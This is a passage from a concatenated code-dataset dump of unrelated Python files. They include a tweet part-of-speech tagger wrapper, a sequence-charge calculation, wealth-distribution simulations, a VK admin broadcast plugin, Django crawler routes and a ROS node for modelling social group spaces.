copula, auxiliaries\n `A` adjective\n `R` adverb\n `!` interjection\n* __Other closed-class words__\n `D` determiner\n `P` pre- or postposition, or subordinating conjunction\n `&` coordinating conjunction\n `T` verb particle\n `X` existential _there_, predeterminers\n* __Twitter/online-specific__\n `#` hashtag (indicates topic/category for tweet)\n `@` at-mention (indicates another user as a recipient of a tweet)\n `~` discourse marker, indications of continuation of a message across multiple tweets\n `U` URL or email address\n `E` emoticon\n* __Miscellaneous__\n `$` numeral\n `,` punctuation\n `G` other abbreviations, foreign words, possessive endings, symbols, garbage\n* __Other Compounds__\n `L` nominal + verbal (e.g. _i'm_), verbal + nominal (_let's_, _lemme_)\n `M` proper noun + verbal\n `Y` `X` + verbal\n\nModified August 2017 by John Meade\n\"\"\"\n\n\nimport shlex, pexpect\nfrom time import time, sleep\n\n\nprinthead = '[ {:^15} ] '.format( 'Tagger' )\ndef p( msg ): print( printhead + msg )\n\n\nclass TweetTagger:\n\n\n def __init__( self, java_opts='-XX:ParallelGCThreads=2 -Xmx500m', jarpath='ark-tweet-nlp-0.3.2/ark-tweet-nlp-0.3.2.jar' ):\n # NOTE default java options are directly lifted from original\n # java implementation. Example of the executed command:\n # java -XX:ParallelGCThreads=2 -Xmx500m -jar vendor/ark-tweet-nlp-0.3.2/ark-tweet-nlp-0.3.2.jar --output-format conll\n self.cmd = ' '.join([ 'java', java_opts, '-jar', jarpath, '--output-format', 'conll' ])\n self.proc = pexpect.spawn( self.cmd, echo=False )\n self.proc.expect('Listening on stdin for input\\. \\(\\-h for help\\)')\n\n\n def kill( self ):\n self.proc.kill( 1 )\n\n\n def __enter__( self ):\n return self\n\n\n def __exit__( self, typ, value, traceback ):\n self.kill()\n\n\n def _parse_raw_result( self, raw_result ):\n \"\"\"Parse the tab-delimited returned lines, modified from:\n https://github.com/brendano/ark-tweet-nlp/blob/master/scripts/show.py\n \"\"\"\n rows = raw_result.split('\\r\\n')\n for line in rows:\n line = line.strip() # remove '\\n'\n if len(line) > 0:\n if line.count( '\\t' ) == 2:\n parts = line.split( '\\t' )\n tokens = parts[0]\n tags = parts[1]\n confidence = float( parts[2] )\n yield tokens, tags, confidence\n\n\n def batch( self, tweets ):\n \"\"\"Call runTagger.sh on a list of tweets, parse the result, return lists of tuples of (term, type, confidence)\"\"\"\n\n # remove carriage returns and newlines, as they are interpreted as\n # tweet separators by the tagger\n tweets_cleaned = [ tw.replace('\\n', ' ').replace('\\r', ' ') for tw in tweets ]\n message = \"\\n\".join( tweets_cleaned )\n\n # force UTF-8 encoding (from internal unicode type) to avoid .communicate encoding error as per:\n # http://stackoverflow.com/questions/3040101/python-encoding-for-pipe-communicate\n # message = message.encode( 'utf-8' )\n\n # print(message, file=self.proc.stdin, flush=True)\n self.proc.write( (message + '\\n\\n').encode('utf-8') )\n # the output of the tagger will terminate with 4 newlines => use this\n # to detect batch completion\n try:\n self.proc.expect( '\\r\\n\\r\\n\\r\\n', timeout=30 )\n except:\n p('Exception while tagging tweets')\n return []\n\n # parse into a list of strings, ie a result for each input message\n raw = self.proc.before.strip().decode('utf-8')\n # occasionally there is a header to trim off...\n raw = ''.join( raw.split('Detected text input format') ).strip()\n # avoid missing result for empty lines?\n # pos_result = pos_result.replace( \"\\n\\n\", \"\\n\\n\\n\" )\n # 
split messages by double carriage returns\n raw_results = raw.split( '\\r\\n\\r\\n' )\n # parse each raw result into its PoS tags\n return [ list( self._parse_raw_result( r ) ) for r in raw_results ]\n\n\nif __name__ == \"__main__\":\n with TweetTagger( jarpath='vendor/ark-tweet-nlp-0.3.2.jar' ) as tw_tag:\n print( \"\\nTweet PoS demo (first call will be slow while Java is booting up)\")\n\n def demo(tweets):\n print( '\\nProcessing: ' + str( tweets ) )\n ti = time()\n res = tw_tag.batch( tweets )\n tf = time()\n print( 'Results: ' + str( res ) )\n print( 'Took: {} seconds'.format( tf - ti ) )\n\n demo([ 'this is a message', 'and a second message' ])\n demo([ 'this is a third message', 'and a fourth message' ])\n demo([ 'this is a fifth message', '' ])\n","sub_path":"CMUTweetTagger.py","file_name":"CMUTweetTagger.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"183836609","text":"'''\nComputation of Sequence Charge Decoration\nAuthor: Yu Qi\n'''\n\ndef BranchedSeqCharge(b1, b2, tail, branchpoint):\n # `\n # ` <-- branch1 | b1 and b2 are branch sequences without the \"tail\"\n # ` V\n # ` (NC)_ _ _ _ <--- TAIL (starts after \"NC\") NC(from formula) is branchpoint\n # ,\n # ,\n # , ^\n # , <-- branch2 \\ tail begins at the 5th char (index 4) in this example\n\n total1 = 0\n total2 = 0\n total3 = 0\n\n pCharged = [\"K\", \"H\", \"R\"]\n nCharged = [\"D\", \"E\"]\n\n #Section 1\n #summation from m=2 (second letter of b1 sequence) to N1\n #summation from n=1 (first letter of b1) to m-1 (second to last letter of b1 sequence)\n\n #First we must add the first and second branches together, with NC in between\n #(branch2 is appended in reverse):\n tempstring = b1 + branchpoint + b2[::-1]\n\n for m in range (1, len(tempstring)): #m is index number of the string - in formula it starts at 2 instead of 1\n if(tempstring[m] in pCharged): #assign Q values based on amino\n q1 = 1\n elif(tempstring[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n for n in range (0, m): #n can be up to m-1, which is essentially c (b/c m = c + 1), but still is the index number of the string\n if(tempstring[n] in pCharged):\n q2 = 1\n elif(tempstring[n] in nCharged):\n q2 = -1\n else:\n q2 = 0\n total1 += q1 * q2 * ((m-n)**0.5)\n print(\"Total1: \" + str(total1) + \"\\n\")\n\n #Section 2\n #to be determined based on sequence indexes, math part is complete.\n\n\n for m in range(0, len(tail)):\n if(tail[m] in pCharged):\n q1 = 1\n elif(tail[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n mIndex = len(b1) + m + 2\n for n in range(0, len(b1)): #if using for index, these are not proper index values\n if(b1[n] in pCharged): #q2 keys off the inner index n, not m\n q2 = 1\n elif(b1[n] in nCharged):\n q2 = -1\n else:\n q2 = 0\n nIndex = n + 1\n nC = len(b1) + 1\n total2 += (q1*q2*((nC - nIndex)**2))/((mIndex-(nIndex))**(3/2))\n print(\"Total2: \" + str(total2) + \"\\n\")\n\n\n #Section 3\n #to be determined based on sequence indexes, math part is complete.\n\n #concatenate and reverse b2 with branching point\n # for instance \"ABC\"(b2) + \"D\" (branching point) becomes \"DCBA\"\n\n tempb2 = b2 + branchpoint\n tempb2reverse = tempb2[::-1]\n\n for m in range(0, len(tempb2reverse)): #if using for index, these are not proper index values\n if(tempb2reverse[m] in pCharged):\n q1 = 1\n elif(tempb2reverse[m] in nCharged):\n q1 = -1\n else:\n q1 = 0\n mIndex = len(b1) + 1 + m\n for n in range(0, 
len(tail)):\n if(tail[n] in pCharged):\n q2 = 1\n elif(tail[n] in nCharged):\n q2 = -1\n else:\n q2 = 0\n nIndex = len(b1) + n + 2\n nC = len(b1) + 1\n total3 += (q1*q2*((mIndex-nC)**2))/((mIndex+nIndex-(2*(nC)))**(3/2))\n print(\"Total3: \" + str(total3) + \"\\n\")\n\n return total1 + total2 + total3\n\n\n","sub_path":"BranchedSeqCharge.py","file_name":"BranchedSeqCharge.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"360226091","text":"#dot = Digraph(comment='The Test Table')\n#dot.node('Root', 'Root')\nimport re\nwith open(\"output_result1.txt\", \"r\") as f:\n a = f.readlines()\n \nfrom graphviz import Digraph\ndot = Digraph(comment='The Test Table')\n# add node A; A's label is 'Dot A'\n#dot.node('Root', 'Root')\n \ndata=[]\nFirst_node=[]\nTotal_node=[]\nedge_info=[]\nfor thing in a :\n thing=thing.replace(' ','').replace('\\n','').replace('_name:',' ')\n temp=thing.split(' ')\n id1=temp[0].split('id')[1]\n id1_name=temp[1].split('id')[0]\n id2=temp[1].split('id')[1]\n id2_name=temp[2].split('connection')[0]\n Total_node.append(id1+'+'+id1_name)\n Total_node.append(id2+'+'+id2_name)\n edge_info.append(id1+'+'+id2)\n#for index1,thing1 in enumerate(data):\n# if(index1<100):\n# temp=thing1.split(' ')\n# First_node.append(temp[0])\n# for index2,thing2 in enumerate(temp):\n# Total_node.append(thing2)\n# if(index2100\nnp.random.seed(101)\ndata = np.random.randint(1, 101, (100, 5))\nprint(data)\n\n# Create 2D vis w/Colorbar and Title\nplt.imshow(data, cmap=\"coolwarm\", aspect='auto')\nplt.title('title')\nplt.colorbar()\nplt.show()\n\n# Create pandas dataframe\ndf = pd.DataFrame(data)\nprint(df)\n\n# Show scatter plot of col 0 vs col 1\ndf.plot(x=0, y=1, kind='scatter')\nplt.show()\n\n# Scale data to have minimum of 0 and max of 1\nscaler = preprocessing.MinMaxScaler()\nscaled_data = scaler.fit_transform(data)\nprint(scaled_data)\n\n# Rename columns, split data into training and test\ndf.columns = ['f1', 'f2', 'f3', 'f4', 'label']\nX = df[['f1', 'f2', 'f3', 'f4']]\ny = df[['label']]\n\nX_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=.33, random_state=42)\n\nprint(X_train)\n","sub_path":"review/_exercise.py","file_name":"_exercise.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313026566","text":"__author__ = 'PE20060014 Chen Wang'\n\nimport os\nimport math\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom savegif import create_gif\n\n# compute the Gini coefficient\ndef gini(initial_money, people, wealth):\n cumul = 0\n ave = np.mean(wealth)\n #print(ave)\n max_cumul = ave * people * (people + 1) / 2\n for i in range(people):\n cumul += (people - i) * (ave - wealth[i])\n gini_index = cumul / max_cumul\n return gini_index\n\n# Boltzmann distribution curve (theoretical fit)\ndef fit1(initial_money, people, step):\n x = np.arange(0.5, 0.5 + people)\n y = np.zeros(people)\n for i in range(people):\n y[i] = -initial_money * math.log(1 - x[i] * 1.0 / people)\n x = np.reshape(x, (len(x), 1))\n y = np.reshape(y, (len(y), 1))\n fitline = np.hstack((x, y))\n return fitline\n\n#S1: debt not allowed\ndef generate1(days):\n import random\n wealth = []\n order = []\n for i in range(100): #assign ids to the 100 players\n order.append(i+1)\n for i in range(100): #initial wealth\n wealth.append(100)\n for j in range(days): #simulate ages 22-65, 15695 days in total\n for i in range(100): #each day every one of the 100 players trades wealth\n if wealth[i]==0: #no debt allowed\n #break #stop the game once someone hits zero wealth\n continue #at zero wealth, skip spending; the game goes on\n else:\n 
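# note on the exchange rule below: every solvent player pays out 1 unit per round\n # and a uniformly chosen player (possibly the payer itself, since the choice\n # includes i) receives it, so total wealth is conserved at 100 * 100 = 10000 --\n # only its distribution changes.\n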
wealth[i] = wealth[i] - 1\n rand_guy=random.choice([x for x in range(0,100) ]) #pick one player uniformly at random\n wealth[rand_guy] = wealth[rand_guy] + 1\n wealth.sort()#sort wealth ascending\n # check for wealth leakage; a sum of 10000 means none was lost\n # print(sum(wealth))\n gini_index = gini(100, 100, wealth) # compute the Gini index\n #print(gini_index)\n # bar chart of the 100 players' wealth\n #fig1 = plt.figure()\n #Boltzmann distribution fit line\n fitline = fit1(100, 100, j)\n if ( j % 200 == 0):\n plt.plot(fitline[:, 0], fitline[:, 1], 'r')\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario1:Debt Disabled\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario1/'+j//200*str(1)+'.png')\n if(j!=days): #keep only the final frame open at the end of the run\n plt.close()\n gif_name = 'Scenario1.gif'\n pic_path = '../pythonProject/Scenario1/' # output directory\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n#S2: debt allowed\ndef generate2(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(100):\n wealth.append(100)\n for j in range(days):#with debt allowed there is no need to check for zero wealth\n for i in range(100):\n
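            # note: unlike generate1 there is no solvency check here, so wealth can go\n            # negative; also the receiver is drawn from the other 99 players (x != i),\n            # while generate1 allows the coin to return to the payer.\n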
wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n wealth[rand_guy]=wealth[rand_guy]+1\n wealth.sort()\n gini_index = gini(100, 100, wealth) # compute the Gini index\n # bar chart of the 100 players' wealth\n # fig1 = plt.figure()\n if ( j % 200 == 0):\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario2:Debt Enabled\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario2/'+j//200*str(1)+'.png')\n if(j!=days): #keep only the final frame open at the end of the run\n plt.close()\n gif_name = 'Scenario2.gif'\n pic_path = '../pythonProject/Scenario2/' # output directory\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n#wealth,order=generate()\n\n#S3: taxing the rich:\ndef generate3(days):\n import random\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(100):\n wealth.append(100.0)\n for j in range(days):\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n if wealth[rand_guy]>=200.0:#players holding at least 200 receive only 0.5 of the incoming unit (a 50% tax)\n wealth[rand_guy] = wealth[rand_guy] + 0.5\n wealth_transi = wealth[:]\n for m in range(5):#the taxed 0.5 is redistributed: 0.1 each to the 5 poorest players\n ind=wealth_transi.index(min(wealth_transi))\n wealth[ind]=wealth[ind]+0.1\n wealth_transi[ind]=100000000\n else:\n wealth[rand_guy] = wealth[rand_guy] + 1\n wealth.sort()\n gini_index = gini(100, 100, wealth) # compute the Gini index\n # bar chart of the 100 players' wealth\n # fig1 = plt.figure()\n if (j % 200 == 0):\n plt.bar(order,wealth,0.5,color=\"blue\")\n plt.title('Scenario3:Debt and 50%TAX Enabled \\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n #plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario3/' + j // 200 * str(1) + '.png')\n if(j!=days): #keep only the final frame open at the end of the run\n plt.close()\n gif_name = 'Scenario3.gif'\n pic_path = '../pythonProject/Scenario3/' # output directory\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n#wealth,order=generate()\n\n#S4: born-rich players appear\ndef generate4(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(10):#the first 10 players are born rich, starting with 400 instead of 100\n wealth.append(400.0)\n for i in range(10,100):\n wealth.append(100.0)\n for j in range(days):#simulate 15695 rounds of redistribution\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guy=random.choice([x for x in range(0,100) if x!=i])\n wealth[rand_guy]=wealth[rand_guy]+1\n # sort while tracking who is rich vs normal\n wealth_transi = wealth[:]\n wealth_sort = []\n order_rich = []\n wealth_rich = []\n order_normal = []\n wealth_normal = []\n for i in range(100):\n ind_min = wealth_transi.index(min(wealth_transi))\n wealth_sort.append(min(wealth_transi))\n wealth_transi[ind_min] = float('inf')\n if ind_min in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n order_rich.append(len(wealth_sort) - 1)\n wealth_rich.append(wealth_sort[-1])\n else:\n order_normal.append(len(wealth_sort) - 1)\n wealth_normal.append(wealth_sort[-1])\n gini_index = gini(100, 100, wealth_sort) # compute the Gini index\n print(gini_index)\n # barchart\n # fig1 = plt.figure()\n if (j % 200 == 0):\n plt.bar(order_rich, wealth_rich, 0.5, color=\"red\")\n plt.bar(order_normal, wealth_normal, 0.5, color=\"blue\")\n plt.title('Scenario4:Born Rich with 400\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario4/' + j // 200 * str(1) + '.png')\n if (j != days): # keep only the final frame open at the end of the run\n plt.close()\n # plt.show()\n gif_name = 'Scenario4.gif'\n pic_path = '../pythonProject/Scenario4/' # output directory\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n#S5: does working harder help?\ndef generate5(days):\n wealth = []\n order = []\n for i in range(100):\n order.append(i+1)\n for i in range(10):\n wealth.append(50)\n for i in range(10,90):\n wealth.append(100)\n for i in range(90,100):\n wealth.append(200) #the last 10 players are born rich, starting with 200\n for j in range(days):\n for i in range(100):\n wealth[i]=wealth[i]-1\n rand_guylist1=[x for x in range(0,10) if x!=i]#ids of players 0-9\n rand_guylist2 = [x for x in range(10, 100) if x != i]#ids of players 10-99\n ind=random.randint(0,1000)\n # the first 10 players are slightly more likely to receive the coin than the other 90 -- by nearly one part in ten thousand -- modelling 10 harder-working players\n if ind<=100:#probability of picking from players 0-9 is 101/1001\n rand_guy = random.choice(rand_guylist1)\n else:#probability of picking from players 10-99 is 900/1001\n rand_guy = random.choice(rand_guylist2)\n wealth[rand_guy]=wealth[rand_guy]+1\n #wealth.sort()#left unsorted so the first 10 players' wealth changes stay visible\n # sort while tracking hard-working / rich / normal players\n wealth_transi = wealth[:]\n wealth_sort = []\n order_rich = []\n wealth_rich = []\n order_hard = []\n wealth_hard = []\n order_normal = []\n wealth_normal = []\n for i in range(100):\n ind_min = wealth_transi.index(min(wealth_transi))\n wealth_sort.append(min(wealth_transi))\n wealth_transi[ind_min] = float('inf')\n if ind_min in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]:\n order_hard.append(len(wealth_sort) - 1)\n wealth_hard.append(wealth_sort[-1])\n elif ind_min in [90, 91, 92, 93, 94, 95, 96, 97, 98, 99]:\n order_rich.append(len(wealth_sort) - 1)\n wealth_rich.append(wealth_sort[-1])\n else:\n order_normal.append(len(wealth_sort) - 1)\n wealth_normal.append(wealth_sort[-1])\n # print(len(order_hard)==len(order_hard),len(order_rich)==len(wealth_rich),len(order_normal)==len(wealth_normal))\n gini_index = gini(100, 100, wealth_sort) # compute the Gini index\n # barchart\n # fig1 = plt.figure()\n if (j%200==0):\n plt.bar(order_rich, wealth_rich, 0.5, color=\"red\")\n plt.bar(order_hard, wealth_hard, 0.5, color=\"green\")\n plt.bar(order_normal, wealth_normal, 0.5, color=\"blue\")\n plt.title('Scenario5:Hard-working by 0.01% VS Born Rich 200%\\nDays:' + str(j) + ' Gini Index:' + str(gini_index))\n plt.xlabel('Order of participants')\n plt.ylabel('Wealth')\n plt.legend()\n plt.draw()\n plt.pause(0.00001)\n plt.savefig('../pythonProject/Scenario5/' + j // 200 * str(1) + '.png')\n if (j != 
days): # keep only the final frame open at the end of the run\n plt.close()\n # plt.show()\n gif_name = 'Scenario5.gif'\n pic_path = '../pythonProject/Scenario5/' # output directory\n duration = 0.1\n create_gif(gif_name, pic_path, duration)\n return wealth, order\n\n\n\ndef main():\n day=15695\n generate1(day)\n\nif __name__ == '__main__':\n main()","sub_path":"面向科学问题求解的编程实践/FinalProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483811044","text":"#encoding:utf-8\nimport re\n\n#Const_File_Format=[\"asp\",\"aspx\",\"html\",\"htm\",\"php\"]\np = re.compile(r'(i say,\\nhello)')\n\nfor line in open(\"list.txt\").readlines():\n\tline=line.strip('\\n')\n\tread_file = open(line, 'r').read()\n\tif \"百家乐\" in read_file: #\"百家乐\" (\"baccarat\") is the spam keyword being searched for\n\t\twith open(\"log.txt\", 'a') as output:\n\t\t\toutput.write(line+\"\\n\")\n\topen(line, 'w').write(p.sub(r'', read_file))","sub_path":"regula/替换.py","file_name":"替换.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"320337427","text":"from handler.base_plugin_command import CommandPlugin\nfrom vk.utils import Wait\nfrom vk.helpers import upload_photo\n\nimport asyncio\nimport aiohttp\nimport io\n\n\nclass DispatchPlugin(CommandPlugin):\n __slots__ = (\"admins\", )\n\n def __init__(self, *commands, prefixes=None, strict=False, admins=()):\n \"\"\"Allows admins to send out messages to users.\"\"\"\n\n super().__init__(*commands, prefixes=prefixes, strict=strict)\n\n self.admins = admins\n\n async def process_message(self, msg):\n if msg.user_id not in self.admins and not msg.meta.get(\"is_moder\"):\n return await msg.answer(\"You are not an administrator.\")\n\n cmd_len = len(msg.meta.get(\"__prefix\", \"\")) + len(msg.meta.get(\"__command\", \"\"))\n\n message = msg.full_text[cmd_len:].strip()\n attachment = \"\"\n\n for a in await msg.get_full_attaches():\n if a.type != \"photo\":\n attachment += str(a) + \",\"\n\n if a.type == \"photo\" and a.url:\n async with aiohttp.ClientSession() as sess:\n async with sess.get(a.url) as resp:\n new_a = await upload_photo(self.api, io.BytesIO(await resp.read()))\n\n if not new_a:\n continue\n\n attachment += str(new_a) + \",\"\n\n await msg.answer(\"Starting the dispatch!\")\n\n if await self.dispatch(message, attachment) is False:\n return await msg.answer(\"Error while sending! 
Please try again later!\")\n\n return await msg.answer(\"Dispatch finished!\")\n\n async def dispatch(self, message, attachment):\n dialogs = await self.bot.api.messages.getDialogs(count=1, preview_length=1)\n\n if not dialogs or \"count\" not in dialogs:\n return False\n\n dialogs = dialogs[\"count\"]\n users = set()\n\n tasks = []\n\n with self.bot.api.mass_request():\n for i in range(int(dialogs / 200) + 1):\n tasks.append(await self.bot.api(wait=Wait.CUSTOM).messages.getDialogs(count=200, preview_length=1))\n\n future = asyncio.gather(*tasks, return_exceptions=True)\n\n await asyncio.wait_for(future, None)\n\n for r in future.result():\n if not r:\n continue\n\n for dialog in r.get(\"items\", []):\n if \"message\" not in dialog or \"user_id\" not in dialog[\"message\"]:\n continue\n\n users.add(int(dialog[\"message\"][\"user_id\"]))\n\n for i, u in enumerate(users):\n await self.bot.api(wait=Wait.NO).messages.send(user_id=u, message=message, attachment=attachment)\n\n if i % 25 == 0:\n await asyncio.sleep(0.2)\n","sub_path":"plugins/misc/dispatch.py","file_name":"dispatch.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"200869629","text":"from django.conf.urls import url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom . import views\nurlpatterns = [\n url(r'^add-crawler', views.Add_Crawlers.as_view(),name='add-crawler'),\n url(r'^execute-crawler', views.Execute_Main_Crawler.as_view(),name='execute-crawler'),\n url(r'^test-add', views.Test_Sample_Data.as_view(),name='test-add'),\n url(r'^fetch-params-csv', views.Fetch_Params_From_Csv.as_view(), name='fetch-csv'),\n url(r'^pick-task-row', views.Pick_TaskRow_To_Execute.as_view(), name='pick-task-row'),\n url(r'^execute-linkedin-local', views.Execute_Linkedin_Local.as_view(), name='execute-linkedin-local'),\n url(r'^pick-task-row', views.Pick_TaskRow_To_Execute.as_view(), name='pick-task-row'),\n url(r'^clean-linkedin-data', views.Scrape_Linkedin_Data.as_view(), name='clean-linkedin-data'),\n url(r'^clean-wiki-data', views.Scrape_Wiki_Data.as_view(), name='clean-wiki-data'),\n #url(r'^clean-mygov-data', views.Scrape_Mygov_Data.as_view(), name='clean-mygov-data'),\n url(r'^clean-raw-data', views.Clean_Raw_Data.as_view(), name='clean-raw-data'),\n]","sub_path":"crawlers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46583236","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nfrom nav_msgs.msg import OccupancyGrid\nfrom map_msgs.msg import OccupancyGridUpdate\nfrom group_msgs.msg import People, Person, Groups\nfrom geometry_msgs.msg import Pose, PoseArray\nfrom algorithm import SpaceModeling\nfrom obstacles import adapt_parameters\n\nfrom human_awareness_msgs.msg import PersonTracker, TrackedPersonsList\n\nimport tf\nimport math\nimport copy\nimport actionlib\nimport numpy as np\n\nimport matlab.engine\neng = matlab.engine.start_matlab()\neng.cd(r'/home/flash/catkin_ws/src/adaptive_social_layers/scripts', nargout=0)\n\nSTRIDE = 65 # in cm\nMDL = 8000\n\n# Relation between personal frontal space and back space\nBACK_FACTOR = 1.3\n\n# Robot radius\nROBOT_DIM = 100 # in cm\n\ndef calc_o_space(persons):\n \"\"\"Calculates the o-space center of the group given group members pose\"\"\"\n c_x = 0\n c_y = 0\n \n # Group size\n g_size = len(persons)\n \n
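    # worked example (illustrative): two people 200 cm apart facing each other along x,\n    # poses (x, y, yaw) = (0, 0, 0.0) and (200, 0, math.pi): each contributes a point\n    # STRIDE = 65 cm ahead of itself, so calc_o_space([(0, 0, 0.0), (200, 0, math.pi)])\n    # returns [100.0, ~0.0] (the y term is only nonzero by floating-point error)\n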
math.cos(person[2]) * STRIDE\n c_y += person[1] + math.sin(person[2]) * STRIDE\n\n center = [c_x / g_size, c_y / g_size]\n\n return center\n\ndef rotate(px, py, angle):\n \"\"\"\n Rotate a point counterclockwise by a given angle around a given origin.\n The angle should be given in radians.\n \"\"\"\n qx = math.cos(angle) * px - math.sin(angle) * py\n qy = math.sin(angle) * px + math.cos(angle) * py\n\n return qx, qy\n\ndef get_index(x, y, width):\n \"\"\" \"\"\"\n \n return (y * width) + x\n\nclass PeoplePublisher():\n \"\"\"\n \"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n rospy.init_node('PeoplePublisher', anonymous=True)\n \n rospy.Subscriber(\"/human_awareness_tracker/trackers_list\",TrackedPersonsList,self.callback,queue_size=1)\n # https://answers.ros.org/question/207620/global-map-update/\n # We need to subscribe both costmap and costmap update topic\n rospy.Subscriber(\"/map\",OccupancyGrid , self.callbackCm, queue_size=1)\n self.loop_rate = rospy.Rate(rospy.get_param('~loop_rate', 10.0))\n\n self.map_received = False\n self.pose_received = False\n\n self.data = None\n self.pub = rospy.Publisher('/people', People, queue_size=10)\n self.pubg = rospy.Publisher('/groups', Groups, queue_size=10)\n\n\n def callback(self,data):\n \"\"\"\n \"\"\"\n \n self.data = data\n self.pose_received = True\n \n\n def callbackCm(self, data):\n \"\"\" Costmap Callback. \"\"\"\n\n self.map = data\n self.map_grid = list(data.data)\n self.map_received = True\n \n def publish(self):\n \"\"\"\n \"\"\"\n \n data = self.data\n groups = []\n group = []\n\n persons = []\n\n listener = tf.TransformListener()\n\n while not rospy.is_shutdown():\n try:\n (trans,rot) = listener.lookupTransform('/map', '/base_footprint', rospy.Time(0))\n break\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n\n tx = trans[0]\n ty = trans[1]\n (_, _, t_yaw) = tf.transformations.euler_from_quaternion(rot)\n\n if not data.personList:\n groups = []\n else:\n for poseinfo in data.personList:\n\n rospy.loginfo(\"Person Detected\")\n pose = poseinfo.body_pose\n quartenion = [pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]\n (_, _, yaw) = tf.transformations.euler_from_quaternion(quartenion)\n\n \n # Pose transformation from base footprint frame to map frame\n (px, py) = rotate(pose.position.x, pose.position.y, t_yaw)\n pose_x = px + tx\n pose_y = py + ty\n pose_yaw = yaw + t_yaw\n\n\n pose_person = (pose_x * 100, pose_y * 100, pose_yaw)\n persons.append(pose_person)\n\n # Run GCFF gcff.m Matlab function \n if persons:\n groups = eng.gcff(MDL,STRIDE, matlab.double(persons))\n \n if groups:\n app = SpaceModeling(groups) # Space modeling works in cm\n pparams,gparams = app.solve()\n\n ####\n # Obstacles works in cm -> Convert to meters\n ox = self.map.info.origin.position.x * 100\n oy = self.map.info.origin.position.y * 100\n origin = [ox, oy]\n resolution = self.map.info.resolution * 100\n width = self.map.info.width \n height = self.map.info.height \n map = self.map.data\n\n pparams_adapt, gparams_adapt = adapt_parameters(groups, pparams, gparams, resolution, map, origin, width, ROBOT_DIM)\n \n\n p = People()\n p.header.frame_id = \"/map\"\n p.header.stamp = rospy.Time.now()\n\n g = Groups()\n g.header.frame_id = \"/map\"\n g.header.stamp = rospy.Time.now()\n \n for idx,group in enumerate(groups):\n aux_p = People()\n aux_p.header.frame_id = \"/map\"\n aux_p.header.stamp = rospy.Time.now()\n\n \n gvarx = float(gparams_adapt[idx][0]) / 100.0 # cm to m\n gvary = 
float(gparams_adapt[idx][1]) / 100.0 # cm to m\n \n \n \n ############## FIXED\n # sx = 0.9\n # sy = 0.9\n #########################\n for pidx, person in enumerate(group):\n\n p1 = Person()\n p1.position.x = person[0] / 100.0 # cm to m\n p1.position.y = person[1] / 100.0 # cm to m\n p1.orientation = person[2]\n\n sx = pparams_adapt[idx][pidx][\"sx\"]/ 100.0\n sy = pparams_adapt[idx][pidx][\"sy\"] / 100.0\n\n sx_back = pparams_adapt[idx][pidx][\"sx_back\"] / 100.0\n \n p1.sx = sx \n p1.sy = sy \n p1.sx_back = sx_back \n \n p1.ospace = False\n p.people.append(p1)\n\n \n aux_p.people.append(p1)\n \n # Only represent o space for +2 individuals\n if len(group) > 1:\n p1 = Person()\n center = calc_o_space(group)\n p1.position.x = center[0] / 100.0 # cm to m\n p1.position.y = center[1] / 100.0 # cm to m\n p1.orientation = math.pi\n\n \n p1.sx = gvarx\n p1.sy = gvary\n\n \n p1.ospace = True\n p.people.append(p1)\n\n aux_p.people.append(p1)\n\n g.groups.append(aux_p)\n\n self.pub.publish(p)\n \n self.pubg.publish(g)\n\n else:\n 